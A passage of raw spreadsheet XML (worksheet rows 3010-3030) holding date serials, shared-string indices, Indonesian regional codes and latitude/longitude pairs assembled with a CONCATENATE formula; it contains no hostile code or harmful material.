        <v>10187</v>
      </c>
      <c r="H3010" t="s">
        <v>26</v>
      </c>
      <c r="J3010" t="s">
        <v>4151</v>
      </c>
      <c r="L3010" t="s">
        <v>10188</v>
      </c>
      <c r="M3010">
        <v>3172080003</v>
      </c>
      <c r="N3010">
        <v>3172080</v>
      </c>
      <c r="O3010">
        <v>3172</v>
      </c>
      <c r="P3010">
        <v>31</v>
      </c>
      <c r="Q3010" t="s">
        <v>2250</v>
      </c>
      <c r="R3010" t="s">
        <v>141</v>
      </c>
      <c r="S3010" t="s">
        <v>49</v>
      </c>
      <c r="T3010" t="s">
        <v>33</v>
      </c>
      <c r="U3010" s="5">
        <v>10695055</v>
      </c>
      <c r="V3010" s="5" t="s">
        <v>17158</v>
      </c>
      <c r="W3010" s="5">
        <v>-621695</v>
      </c>
      <c r="X3010" t="s">
        <v>20276</v>
      </c>
      <c r="Y3010" t="str">
        <f t="shared" si="46"/>
        <v>-6.21695,106.95055</v>
      </c>
    </row>
    <row r="3011" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3011">
        <v>247389</v>
      </c>
      <c r="B3011" s="1">
        <v>44241</v>
      </c>
      <c r="C3011" s="2">
        <v>0.61870370370370364</v>
      </c>
      <c r="D3011" t="s">
        <v>22</v>
      </c>
      <c r="E3011" t="s">
        <v>23</v>
      </c>
      <c r="F3011" t="s">
        <v>10189</v>
      </c>
      <c r="G3011" t="s">
        <v>10190</v>
      </c>
      <c r="H3011" t="s">
        <v>26</v>
      </c>
      <c r="I3011" t="s">
        <v>137</v>
      </c>
      <c r="J3011" t="s">
        <v>2622</v>
      </c>
      <c r="M3011">
        <v>3518140009</v>
      </c>
      <c r="N3011">
        <v>3518140</v>
      </c>
      <c r="O3011">
        <v>3518</v>
      </c>
      <c r="P3011">
        <v>35</v>
      </c>
      <c r="Q3011" t="s">
        <v>10191</v>
      </c>
      <c r="R3011" t="s">
        <v>10192</v>
      </c>
      <c r="S3011" t="s">
        <v>10192</v>
      </c>
      <c r="T3011" t="s">
        <v>1221</v>
      </c>
      <c r="U3011" s="5">
        <v>11190820</v>
      </c>
      <c r="V3011" s="5" t="s">
        <v>17159</v>
      </c>
      <c r="W3011" s="5">
        <v>-760704</v>
      </c>
      <c r="X3011" t="s">
        <v>20901</v>
      </c>
      <c r="Y3011" t="str">
        <f t="shared" ref="Y3011:Y3074" si="47">CONCATENATE(X3011,",",V3011)</f>
        <v>-7.60704,111.90820</v>
      </c>
    </row>
    <row r="3012" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3012">
        <v>247390</v>
      </c>
      <c r="B3012" s="1">
        <v>44241</v>
      </c>
      <c r="C3012" s="2">
        <v>0.79130787037037031</v>
      </c>
      <c r="D3012" t="s">
        <v>22</v>
      </c>
      <c r="E3012" t="s">
        <v>23</v>
      </c>
      <c r="F3012" t="s">
        <v>10193</v>
      </c>
      <c r="G3012" t="s">
        <v>10194</v>
      </c>
      <c r="H3012" t="s">
        <v>26</v>
      </c>
      <c r="I3012" t="s">
        <v>1991</v>
      </c>
      <c r="J3012" t="s">
        <v>2622</v>
      </c>
      <c r="L3012" t="s">
        <v>10195</v>
      </c>
      <c r="M3012">
        <v>3517100017</v>
      </c>
      <c r="N3012">
        <v>3517100</v>
      </c>
      <c r="O3012">
        <v>3517</v>
      </c>
      <c r="P3012">
        <v>35</v>
      </c>
      <c r="Q3012" t="s">
        <v>10196</v>
      </c>
      <c r="R3012" t="s">
        <v>10197</v>
      </c>
      <c r="S3012" t="s">
        <v>340</v>
      </c>
      <c r="T3012" t="s">
        <v>1221</v>
      </c>
      <c r="U3012" s="5">
        <v>11234699</v>
      </c>
      <c r="V3012" s="5" t="s">
        <v>17160</v>
      </c>
      <c r="W3012" s="5">
        <v>-751217</v>
      </c>
      <c r="X3012" t="s">
        <v>20902</v>
      </c>
      <c r="Y3012" t="str">
        <f t="shared" si="47"/>
        <v>-7.51217,112.34699</v>
      </c>
    </row>
    <row r="3013" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3013">
        <v>247391</v>
      </c>
      <c r="B3013" s="1">
        <v>44242</v>
      </c>
      <c r="C3013" s="2">
        <v>0.1017824074074074</v>
      </c>
      <c r="D3013" t="s">
        <v>22</v>
      </c>
      <c r="E3013" t="s">
        <v>23</v>
      </c>
      <c r="F3013" t="s">
        <v>10198</v>
      </c>
      <c r="G3013" t="s">
        <v>10199</v>
      </c>
      <c r="H3013" t="s">
        <v>26</v>
      </c>
      <c r="I3013" t="s">
        <v>65</v>
      </c>
      <c r="J3013" t="s">
        <v>2622</v>
      </c>
      <c r="L3013" t="s">
        <v>10200</v>
      </c>
      <c r="M3013">
        <v>3518140004</v>
      </c>
      <c r="N3013">
        <v>3518140</v>
      </c>
      <c r="O3013">
        <v>3518</v>
      </c>
      <c r="P3013">
        <v>35</v>
      </c>
      <c r="Q3013" t="s">
        <v>10201</v>
      </c>
      <c r="R3013" t="s">
        <v>10192</v>
      </c>
      <c r="S3013" t="s">
        <v>10192</v>
      </c>
      <c r="T3013" t="s">
        <v>1221</v>
      </c>
      <c r="U3013" s="5">
        <v>11190406</v>
      </c>
      <c r="V3013" s="5" t="s">
        <v>17161</v>
      </c>
      <c r="W3013" s="5">
        <v>-761174</v>
      </c>
      <c r="X3013" t="s">
        <v>20903</v>
      </c>
      <c r="Y3013" t="str">
        <f t="shared" si="47"/>
        <v>-7.61174,111.90406</v>
      </c>
    </row>
    <row r="3014" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3014">
        <v>247392</v>
      </c>
      <c r="B3014" s="1">
        <v>44242</v>
      </c>
      <c r="C3014" s="2">
        <v>0.15694444444444444</v>
      </c>
      <c r="D3014" t="s">
        <v>2648</v>
      </c>
      <c r="E3014" t="s">
        <v>23</v>
      </c>
      <c r="G3014" t="s">
        <v>10202</v>
      </c>
      <c r="H3014" t="s">
        <v>26</v>
      </c>
      <c r="J3014" t="s">
        <v>524</v>
      </c>
      <c r="L3014" t="s">
        <v>10203</v>
      </c>
      <c r="M3014">
        <v>3173070001</v>
      </c>
      <c r="N3014">
        <v>3173070</v>
      </c>
      <c r="O3014">
        <v>3173</v>
      </c>
      <c r="P3014">
        <v>31</v>
      </c>
      <c r="Q3014" t="s">
        <v>322</v>
      </c>
      <c r="R3014" t="s">
        <v>323</v>
      </c>
      <c r="S3014" t="s">
        <v>62</v>
      </c>
      <c r="T3014" t="s">
        <v>33</v>
      </c>
      <c r="U3014" s="5">
        <v>10683281</v>
      </c>
      <c r="V3014" s="5" t="s">
        <v>17162</v>
      </c>
      <c r="W3014" s="5">
        <v>-616089</v>
      </c>
      <c r="X3014" t="s">
        <v>20904</v>
      </c>
      <c r="Y3014" t="str">
        <f t="shared" si="47"/>
        <v>-6.16089,106.83281</v>
      </c>
    </row>
    <row r="3015" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3015">
        <v>247397</v>
      </c>
      <c r="B3015" s="1">
        <v>44242</v>
      </c>
      <c r="C3015" s="2">
        <v>0.34658564814814818</v>
      </c>
      <c r="D3015" t="s">
        <v>22</v>
      </c>
      <c r="E3015" t="s">
        <v>23</v>
      </c>
      <c r="F3015" t="s">
        <v>10204</v>
      </c>
      <c r="G3015" t="s">
        <v>10205</v>
      </c>
      <c r="H3015" t="s">
        <v>26</v>
      </c>
      <c r="I3015" t="s">
        <v>137</v>
      </c>
      <c r="J3015" t="s">
        <v>2622</v>
      </c>
      <c r="L3015" t="s">
        <v>10206</v>
      </c>
      <c r="M3015">
        <v>3518020005</v>
      </c>
      <c r="N3015">
        <v>3518020</v>
      </c>
      <c r="O3015">
        <v>3518</v>
      </c>
      <c r="P3015">
        <v>35</v>
      </c>
      <c r="Q3015" t="s">
        <v>10207</v>
      </c>
      <c r="R3015" t="s">
        <v>10207</v>
      </c>
      <c r="S3015" t="s">
        <v>10192</v>
      </c>
      <c r="T3015" t="s">
        <v>1221</v>
      </c>
      <c r="U3015" s="5">
        <v>11183626</v>
      </c>
      <c r="V3015" s="5" t="s">
        <v>17163</v>
      </c>
      <c r="W3015" s="5">
        <v>-767966</v>
      </c>
      <c r="X3015" t="s">
        <v>20905</v>
      </c>
      <c r="Y3015" t="str">
        <f t="shared" si="47"/>
        <v>-7.67966,111.83626</v>
      </c>
    </row>
    <row r="3016" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3016">
        <v>247398</v>
      </c>
      <c r="B3016" s="1">
        <v>44242</v>
      </c>
      <c r="C3016" s="2">
        <v>0.55967592592592597</v>
      </c>
      <c r="D3016" t="s">
        <v>22</v>
      </c>
      <c r="E3016" t="s">
        <v>23</v>
      </c>
      <c r="F3016" t="s">
        <v>10208</v>
      </c>
      <c r="H3016" t="s">
        <v>26</v>
      </c>
      <c r="I3016" t="s">
        <v>1538</v>
      </c>
      <c r="J3016" t="s">
        <v>2622</v>
      </c>
      <c r="L3016" t="s">
        <v>10209</v>
      </c>
      <c r="M3016">
        <v>3515110005</v>
      </c>
      <c r="N3016">
        <v>3515110</v>
      </c>
      <c r="O3016">
        <v>3515</v>
      </c>
      <c r="P3016">
        <v>35</v>
      </c>
      <c r="Q3016" t="s">
        <v>10210</v>
      </c>
      <c r="R3016" t="s">
        <v>1928</v>
      </c>
      <c r="S3016" t="s">
        <v>1928</v>
      </c>
      <c r="T3016" t="s">
        <v>1221</v>
      </c>
      <c r="U3016" s="5">
        <v>11270908</v>
      </c>
      <c r="V3016" s="5" t="s">
        <v>17164</v>
      </c>
      <c r="W3016" s="5">
        <v>-746096</v>
      </c>
      <c r="X3016" t="s">
        <v>20906</v>
      </c>
      <c r="Y3016" t="str">
        <f t="shared" si="47"/>
        <v>-7.46096,112.70908</v>
      </c>
    </row>
    <row r="3017" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3017">
        <v>247399</v>
      </c>
      <c r="B3017" s="1">
        <v>44242</v>
      </c>
      <c r="C3017" s="2">
        <v>0.56666666666666665</v>
      </c>
      <c r="D3017" t="s">
        <v>2648</v>
      </c>
      <c r="E3017" t="s">
        <v>23</v>
      </c>
      <c r="G3017" t="s">
        <v>10211</v>
      </c>
      <c r="H3017" t="s">
        <v>26</v>
      </c>
      <c r="J3017" t="s">
        <v>2926</v>
      </c>
      <c r="L3017" t="s">
        <v>10212</v>
      </c>
      <c r="M3017">
        <v>3175060004</v>
      </c>
      <c r="N3017">
        <v>3175060</v>
      </c>
      <c r="O3017">
        <v>3175</v>
      </c>
      <c r="P3017">
        <v>31</v>
      </c>
      <c r="Q3017" t="s">
        <v>2279</v>
      </c>
      <c r="R3017" t="s">
        <v>2279</v>
      </c>
      <c r="S3017" t="s">
        <v>547</v>
      </c>
      <c r="T3017" t="s">
        <v>33</v>
      </c>
      <c r="U3017" s="5">
        <v>10694719</v>
      </c>
      <c r="V3017" s="5" t="s">
        <v>17165</v>
      </c>
      <c r="W3017" s="5">
        <v>-610417</v>
      </c>
      <c r="X3017" t="s">
        <v>20907</v>
      </c>
      <c r="Y3017" t="str">
        <f t="shared" si="47"/>
        <v>-6.10417,106.94719</v>
      </c>
    </row>
    <row r="3018" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3018">
        <v>247411</v>
      </c>
      <c r="B3018" s="1">
        <v>44242</v>
      </c>
      <c r="C3018" s="2">
        <v>0.60932870370370373</v>
      </c>
      <c r="D3018" t="s">
        <v>22</v>
      </c>
      <c r="E3018" t="s">
        <v>23</v>
      </c>
      <c r="F3018" t="s">
        <v>10213</v>
      </c>
      <c r="G3018" t="s">
        <v>10214</v>
      </c>
      <c r="H3018" t="s">
        <v>26</v>
      </c>
      <c r="I3018" t="s">
        <v>137</v>
      </c>
      <c r="J3018" t="s">
        <v>2622</v>
      </c>
      <c r="L3018" t="s">
        <v>10215</v>
      </c>
      <c r="M3018">
        <v>3518140004</v>
      </c>
      <c r="N3018">
        <v>3518140</v>
      </c>
      <c r="O3018">
        <v>3518</v>
      </c>
      <c r="P3018">
        <v>35</v>
      </c>
      <c r="Q3018" t="s">
        <v>10201</v>
      </c>
      <c r="R3018" t="s">
        <v>10192</v>
      </c>
      <c r="S3018" t="s">
        <v>10192</v>
      </c>
      <c r="T3018" t="s">
        <v>1221</v>
      </c>
      <c r="U3018" s="5">
        <v>11189957</v>
      </c>
      <c r="V3018" s="5" t="s">
        <v>17166</v>
      </c>
      <c r="W3018" s="5">
        <v>-760989</v>
      </c>
      <c r="X3018" t="s">
        <v>20908</v>
      </c>
      <c r="Y3018" t="str">
        <f t="shared" si="47"/>
        <v>-7.60989,111.89957</v>
      </c>
    </row>
    <row r="3019" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3019">
        <v>247418</v>
      </c>
      <c r="B3019" s="1">
        <v>44242</v>
      </c>
      <c r="C3019" s="2">
        <v>0.62961805555555561</v>
      </c>
      <c r="D3019" t="s">
        <v>22</v>
      </c>
      <c r="E3019" t="s">
        <v>23</v>
      </c>
      <c r="F3019" t="s">
        <v>10216</v>
      </c>
      <c r="G3019" t="s">
        <v>10217</v>
      </c>
      <c r="H3019" t="s">
        <v>26</v>
      </c>
      <c r="I3019" t="s">
        <v>1080</v>
      </c>
      <c r="J3019" t="s">
        <v>2622</v>
      </c>
      <c r="L3019" t="s">
        <v>10218</v>
      </c>
      <c r="M3019">
        <v>3518020005</v>
      </c>
      <c r="N3019">
        <v>3518020</v>
      </c>
      <c r="O3019">
        <v>3518</v>
      </c>
      <c r="P3019">
        <v>35</v>
      </c>
      <c r="Q3019" t="s">
        <v>10207</v>
      </c>
      <c r="R3019" t="s">
        <v>10207</v>
      </c>
      <c r="S3019" t="s">
        <v>10192</v>
      </c>
      <c r="T3019" t="s">
        <v>1221</v>
      </c>
      <c r="U3019" s="5">
        <v>11183690</v>
      </c>
      <c r="V3019" s="5" t="s">
        <v>17167</v>
      </c>
      <c r="W3019" s="5">
        <v>-771358</v>
      </c>
      <c r="X3019" t="s">
        <v>20909</v>
      </c>
      <c r="Y3019" t="str">
        <f t="shared" si="47"/>
        <v>-7.71358,111.83690</v>
      </c>
    </row>
    <row r="3020" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3020">
        <v>247467</v>
      </c>
      <c r="B3020" s="1">
        <v>44242</v>
      </c>
      <c r="C3020" s="2">
        <v>0.79488425925925921</v>
      </c>
      <c r="D3020" t="s">
        <v>22</v>
      </c>
      <c r="E3020" t="s">
        <v>23</v>
      </c>
      <c r="F3020" t="s">
        <v>10219</v>
      </c>
      <c r="H3020" t="s">
        <v>26</v>
      </c>
      <c r="I3020" t="s">
        <v>3024</v>
      </c>
      <c r="J3020" t="s">
        <v>1355</v>
      </c>
      <c r="L3020" t="s">
        <v>10220</v>
      </c>
      <c r="M3020">
        <v>3174070002</v>
      </c>
      <c r="N3020">
        <v>3174070</v>
      </c>
      <c r="O3020">
        <v>3174</v>
      </c>
      <c r="P3020">
        <v>31</v>
      </c>
      <c r="Q3020" t="s">
        <v>621</v>
      </c>
      <c r="R3020" t="s">
        <v>84</v>
      </c>
      <c r="S3020" t="s">
        <v>32</v>
      </c>
      <c r="T3020" t="s">
        <v>33</v>
      </c>
      <c r="U3020" s="5">
        <v>10674693</v>
      </c>
      <c r="V3020" s="5" t="s">
        <v>17168</v>
      </c>
      <c r="W3020" s="5">
        <v>-616073</v>
      </c>
      <c r="X3020" t="s">
        <v>20910</v>
      </c>
      <c r="Y3020" t="str">
        <f t="shared" si="47"/>
        <v>-6.16073,106.74693</v>
      </c>
    </row>
    <row r="3021" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3021">
        <v>247472</v>
      </c>
      <c r="B3021" s="1">
        <v>44242</v>
      </c>
      <c r="C3021" s="2">
        <v>0.80943287037037026</v>
      </c>
      <c r="D3021" t="s">
        <v>22</v>
      </c>
      <c r="E3021" t="s">
        <v>23</v>
      </c>
      <c r="F3021" t="s">
        <v>10221</v>
      </c>
      <c r="G3021" t="s">
        <v>10222</v>
      </c>
      <c r="H3021" t="s">
        <v>26</v>
      </c>
      <c r="I3021" t="s">
        <v>1046</v>
      </c>
      <c r="J3021" t="s">
        <v>2871</v>
      </c>
      <c r="L3021" t="s">
        <v>10223</v>
      </c>
      <c r="M3021">
        <v>3172080003</v>
      </c>
      <c r="N3021">
        <v>3172080</v>
      </c>
      <c r="O3021">
        <v>3172</v>
      </c>
      <c r="P3021">
        <v>31</v>
      </c>
      <c r="Q3021" t="s">
        <v>2250</v>
      </c>
      <c r="R3021" t="s">
        <v>141</v>
      </c>
      <c r="S3021" t="s">
        <v>49</v>
      </c>
      <c r="T3021" t="s">
        <v>33</v>
      </c>
      <c r="U3021" s="5">
        <v>10695786</v>
      </c>
      <c r="V3021" s="5" t="s">
        <v>17169</v>
      </c>
      <c r="W3021" s="5">
        <v>-620222</v>
      </c>
      <c r="X3021" t="s">
        <v>20911</v>
      </c>
      <c r="Y3021" t="str">
        <f t="shared" si="47"/>
        <v>-6.20222,106.95786</v>
      </c>
    </row>
    <row r="3022" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3022">
        <v>247475</v>
      </c>
      <c r="B3022" s="1">
        <v>44242</v>
      </c>
      <c r="C3022" s="2">
        <v>0.81041666666666667</v>
      </c>
      <c r="D3022" t="s">
        <v>2648</v>
      </c>
      <c r="E3022" t="s">
        <v>23</v>
      </c>
      <c r="G3022" t="s">
        <v>10224</v>
      </c>
      <c r="H3022" t="s">
        <v>26</v>
      </c>
      <c r="J3022" t="s">
        <v>10225</v>
      </c>
      <c r="L3022" t="s">
        <v>10226</v>
      </c>
      <c r="M3022">
        <v>3172090003</v>
      </c>
      <c r="N3022">
        <v>3172090</v>
      </c>
      <c r="O3022">
        <v>3172</v>
      </c>
      <c r="P3022">
        <v>31</v>
      </c>
      <c r="Q3022" t="s">
        <v>10227</v>
      </c>
      <c r="R3022" t="s">
        <v>890</v>
      </c>
      <c r="S3022" t="s">
        <v>49</v>
      </c>
      <c r="T3022" t="s">
        <v>33</v>
      </c>
      <c r="U3022" s="5">
        <v>10689924</v>
      </c>
      <c r="V3022" s="5" t="s">
        <v>17170</v>
      </c>
      <c r="W3022" s="5">
        <v>-621023</v>
      </c>
      <c r="X3022" t="s">
        <v>20912</v>
      </c>
      <c r="Y3022" t="str">
        <f t="shared" si="47"/>
        <v>-6.21023,106.89924</v>
      </c>
    </row>
    <row r="3023" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3023">
        <v>247478</v>
      </c>
      <c r="B3023" s="1">
        <v>44242</v>
      </c>
      <c r="C3023" s="2">
        <v>0.81771990740740741</v>
      </c>
      <c r="D3023" t="s">
        <v>22</v>
      </c>
      <c r="E3023" t="s">
        <v>23</v>
      </c>
      <c r="F3023" t="s">
        <v>10228</v>
      </c>
      <c r="H3023" t="s">
        <v>26</v>
      </c>
      <c r="I3023" t="s">
        <v>5309</v>
      </c>
      <c r="J3023" t="s">
        <v>2627</v>
      </c>
      <c r="L3023" t="s">
        <v>10229</v>
      </c>
      <c r="M3023">
        <v>3275061004</v>
      </c>
      <c r="N3023">
        <v>3275061</v>
      </c>
      <c r="O3023">
        <v>3275</v>
      </c>
      <c r="P3023">
        <v>32</v>
      </c>
      <c r="Q3023" t="s">
        <v>39</v>
      </c>
      <c r="R3023" t="s">
        <v>40</v>
      </c>
      <c r="S3023" t="s">
        <v>41</v>
      </c>
      <c r="T3023" t="s">
        <v>42</v>
      </c>
      <c r="U3023" s="5">
        <v>10698609</v>
      </c>
      <c r="V3023" s="5" t="s">
        <v>17171</v>
      </c>
      <c r="W3023" s="5">
        <v>-617658</v>
      </c>
      <c r="X3023" t="s">
        <v>20913</v>
      </c>
      <c r="Y3023" t="str">
        <f t="shared" si="47"/>
        <v>-6.17658,106.98609</v>
      </c>
    </row>
    <row r="3024" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3024">
        <v>247483</v>
      </c>
      <c r="B3024" s="1">
        <v>44242</v>
      </c>
      <c r="C3024" s="2">
        <v>0.82427083333333329</v>
      </c>
      <c r="D3024" t="s">
        <v>22</v>
      </c>
      <c r="E3024" t="s">
        <v>23</v>
      </c>
      <c r="F3024" t="s">
        <v>10230</v>
      </c>
      <c r="H3024" t="s">
        <v>26</v>
      </c>
      <c r="I3024" t="s">
        <v>1862</v>
      </c>
      <c r="J3024" t="s">
        <v>2627</v>
      </c>
      <c r="L3024" t="s">
        <v>10231</v>
      </c>
      <c r="M3024">
        <v>3275061002</v>
      </c>
      <c r="N3024">
        <v>3275061</v>
      </c>
      <c r="O3024">
        <v>3275</v>
      </c>
      <c r="P3024">
        <v>32</v>
      </c>
      <c r="Q3024" t="s">
        <v>10232</v>
      </c>
      <c r="R3024" t="s">
        <v>40</v>
      </c>
      <c r="S3024" t="s">
        <v>41</v>
      </c>
      <c r="T3024" t="s">
        <v>42</v>
      </c>
      <c r="U3024" s="5">
        <v>10698010</v>
      </c>
      <c r="V3024" s="5" t="s">
        <v>17172</v>
      </c>
      <c r="W3024" s="5">
        <v>-621909</v>
      </c>
      <c r="X3024" t="s">
        <v>20914</v>
      </c>
      <c r="Y3024" t="str">
        <f t="shared" si="47"/>
        <v>-6.21909,106.98010</v>
      </c>
    </row>
    <row r="3025" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3025">
        <v>247548</v>
      </c>
      <c r="B3025" s="1">
        <v>44242</v>
      </c>
      <c r="C3025" s="2">
        <v>0.93659722222222219</v>
      </c>
      <c r="D3025" t="s">
        <v>22</v>
      </c>
      <c r="E3025" t="s">
        <v>23</v>
      </c>
      <c r="F3025" s="3" t="s">
        <v>10233</v>
      </c>
      <c r="G3025" t="s">
        <v>10234</v>
      </c>
      <c r="H3025" t="s">
        <v>26</v>
      </c>
      <c r="I3025" t="s">
        <v>137</v>
      </c>
      <c r="J3025" t="s">
        <v>2627</v>
      </c>
      <c r="L3025" t="s">
        <v>10235</v>
      </c>
      <c r="M3025">
        <v>3275060005</v>
      </c>
      <c r="N3025">
        <v>3275060</v>
      </c>
      <c r="O3025">
        <v>3275</v>
      </c>
      <c r="P3025">
        <v>32</v>
      </c>
      <c r="Q3025" t="s">
        <v>3526</v>
      </c>
      <c r="R3025" t="s">
        <v>114</v>
      </c>
      <c r="S3025" t="s">
        <v>41</v>
      </c>
      <c r="T3025" t="s">
        <v>42</v>
      </c>
      <c r="U3025" s="5">
        <v>10695920</v>
      </c>
      <c r="V3025" s="5" t="s">
        <v>17173</v>
      </c>
      <c r="W3025" s="5">
        <v>-621612</v>
      </c>
      <c r="X3025" t="s">
        <v>20915</v>
      </c>
      <c r="Y3025" t="str">
        <f t="shared" si="47"/>
        <v>-6.21612,106.95920</v>
      </c>
    </row>
    <row r="3026" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3026">
        <v>247557</v>
      </c>
      <c r="B3026" s="1">
        <v>44242</v>
      </c>
      <c r="C3026" s="2">
        <v>0.95045138888888892</v>
      </c>
      <c r="D3026" t="s">
        <v>22</v>
      </c>
      <c r="E3026" t="s">
        <v>23</v>
      </c>
      <c r="F3026" t="s">
        <v>10236</v>
      </c>
      <c r="G3026" t="s">
        <v>10237</v>
      </c>
      <c r="H3026" t="s">
        <v>26</v>
      </c>
      <c r="I3026" t="s">
        <v>137</v>
      </c>
      <c r="J3026" t="s">
        <v>2627</v>
      </c>
      <c r="L3026" t="s">
        <v>10238</v>
      </c>
      <c r="M3026">
        <v>3275060005</v>
      </c>
      <c r="N3026">
        <v>3275060</v>
      </c>
      <c r="O3026">
        <v>3275</v>
      </c>
      <c r="P3026">
        <v>32</v>
      </c>
      <c r="Q3026" t="s">
        <v>3526</v>
      </c>
      <c r="R3026" t="s">
        <v>114</v>
      </c>
      <c r="S3026" t="s">
        <v>41</v>
      </c>
      <c r="T3026" t="s">
        <v>42</v>
      </c>
      <c r="U3026" s="5">
        <v>10695921</v>
      </c>
      <c r="V3026" s="5" t="s">
        <v>17174</v>
      </c>
      <c r="W3026" s="5">
        <v>-621613</v>
      </c>
      <c r="X3026" t="s">
        <v>20916</v>
      </c>
      <c r="Y3026" t="str">
        <f t="shared" si="47"/>
        <v>-6.21613,106.95921</v>
      </c>
    </row>
    <row r="3027" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3027">
        <v>247572</v>
      </c>
      <c r="B3027" s="1">
        <v>44242</v>
      </c>
      <c r="C3027" s="2">
        <v>0.97362268518518524</v>
      </c>
      <c r="D3027" t="s">
        <v>22</v>
      </c>
      <c r="E3027" t="s">
        <v>23</v>
      </c>
      <c r="F3027" t="s">
        <v>10239</v>
      </c>
      <c r="G3027" t="s">
        <v>10240</v>
      </c>
      <c r="H3027" t="s">
        <v>26</v>
      </c>
      <c r="I3027" t="s">
        <v>523</v>
      </c>
      <c r="J3027" t="s">
        <v>2622</v>
      </c>
      <c r="L3027" t="s">
        <v>10241</v>
      </c>
      <c r="M3027">
        <v>3515110015</v>
      </c>
      <c r="N3027">
        <v>3515110</v>
      </c>
      <c r="O3027">
        <v>3515</v>
      </c>
      <c r="P3027">
        <v>35</v>
      </c>
      <c r="Q3027" t="s">
        <v>10242</v>
      </c>
      <c r="R3027" t="s">
        <v>1928</v>
      </c>
      <c r="S3027" t="s">
        <v>1928</v>
      </c>
      <c r="T3027" t="s">
        <v>1221</v>
      </c>
      <c r="U3027" s="5">
        <v>11273442</v>
      </c>
      <c r="V3027" s="5" t="s">
        <v>17175</v>
      </c>
      <c r="W3027" s="5">
        <v>-745415</v>
      </c>
      <c r="X3027" t="s">
        <v>20917</v>
      </c>
      <c r="Y3027" t="str">
        <f t="shared" si="47"/>
        <v>-7.45415,112.73442</v>
      </c>
    </row>
    <row r="3028" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3028">
        <v>247631</v>
      </c>
      <c r="B3028" s="1">
        <v>44243</v>
      </c>
      <c r="C3028" s="2">
        <v>7.2673611111111105E-2</v>
      </c>
      <c r="D3028" t="s">
        <v>22</v>
      </c>
      <c r="E3028" t="s">
        <v>23</v>
      </c>
      <c r="F3028" t="s">
        <v>10243</v>
      </c>
      <c r="G3028" t="s">
        <v>10244</v>
      </c>
      <c r="H3028" t="s">
        <v>9262</v>
      </c>
      <c r="I3028" t="s">
        <v>10245</v>
      </c>
      <c r="J3028" t="s">
        <v>2622</v>
      </c>
      <c r="L3028" t="s">
        <v>10246</v>
      </c>
      <c r="M3028">
        <v>3504190010</v>
      </c>
      <c r="N3028">
        <v>3504190</v>
      </c>
      <c r="O3028">
        <v>3504</v>
      </c>
      <c r="P3028">
        <v>35</v>
      </c>
      <c r="Q3028" t="s">
        <v>10247</v>
      </c>
      <c r="R3028" t="s">
        <v>10248</v>
      </c>
      <c r="S3028" t="s">
        <v>10249</v>
      </c>
      <c r="T3028" t="s">
        <v>1221</v>
      </c>
      <c r="U3028" s="5">
        <v>11180341</v>
      </c>
      <c r="V3028" s="5" t="s">
        <v>17176</v>
      </c>
      <c r="W3028" s="5">
        <v>-786578</v>
      </c>
      <c r="X3028" t="s">
        <v>20918</v>
      </c>
      <c r="Y3028" t="str">
        <f t="shared" si="47"/>
        <v>-7.86578,111.80341</v>
      </c>
    </row>
    <row r="3029" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3029">
        <v>247634</v>
      </c>
      <c r="B3029" s="1">
        <v>44243</v>
      </c>
      <c r="C3029" s="2">
        <v>7.2222222222222229E-2</v>
      </c>
      <c r="D3029" t="s">
        <v>2648</v>
      </c>
      <c r="E3029" t="s">
        <v>23</v>
      </c>
      <c r="G3029" t="s">
        <v>10250</v>
      </c>
      <c r="H3029" t="s">
        <v>26</v>
      </c>
      <c r="J3029" t="s">
        <v>404</v>
      </c>
      <c r="L3029" t="s">
        <v>10251</v>
      </c>
      <c r="M3029">
        <v>3174020005</v>
      </c>
      <c r="N3029">
        <v>3174020</v>
      </c>
      <c r="O3029">
        <v>3174</v>
      </c>
      <c r="P3029">
        <v>31</v>
      </c>
      <c r="Q3029" t="s">
        <v>30</v>
      </c>
      <c r="R3029" t="s">
        <v>31</v>
      </c>
      <c r="S3029" t="s">
        <v>32</v>
      </c>
      <c r="T3029" t="s">
        <v>33</v>
      </c>
      <c r="U3029" s="5">
        <v>10677084</v>
      </c>
      <c r="V3029" s="5" t="s">
        <v>17177</v>
      </c>
      <c r="W3029" s="5">
        <v>-616649</v>
      </c>
      <c r="X3029" t="s">
        <v>20797</v>
      </c>
      <c r="Y3029" t="str">
        <f t="shared" si="47"/>
        <v>-6.16649,106.77084</v>
      </c>
    </row>
    <row r="3030" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3030">
        <v>247641</v>
      </c>
      <c r="B3030" s="1">
        <v>44243</v>
      </c>
      <c r="C3030" s="2">
        <v>7.8472222222222221E-2</v>
      </c>
      <c r="D3030" t="s">
        <v>2648</v>
      </c>
      <c r="E3030" t="s">
        <v>23</v>
      </c>
      <c r="G3030" t="s">
        <v>10252</v>
      </c>
      <c r="H3030" t="s">
        <v>26</v>
      </c>
      <c r="I3030" t="s">
        <v>103</v>
      </c>
      <c r="J3030" t="s">
        <v>4517</v>
      </c>
      <c r="L3030" t="s">
        <v>10253</v>
      </c>
      <c r="M3030">
        <v>3173010003</v>
      </c>
      <c r="N3030">
        <v>3173010</v>
      </c>
      <c r="O3030">
        <v>3173</v>
      </c>
      <c r="P3030">
        <v>31</v>
      </c>
      <c r="Q3030" t="s">
        <v>2338</v>
      </c>
      <c r="R3030" t="s">
        <v>1481</v>
      </c>
      <c r="S3030" t="s">
        <v>62</v>
      </c>
      <c r="T3030" t="s">
        <v>33</v>
      </c>
      <c r="U3030" s="5">
        <v>10682186</v>
      </c>
      <c r="V3030" s="5" t="s">
        <v>17178</v>
      </c>
      <c r="W3030" s="5">
        <v>-620646</v>
      </c>
      <c r="X3030" t="s">
        <v>20919</v>
      </c>
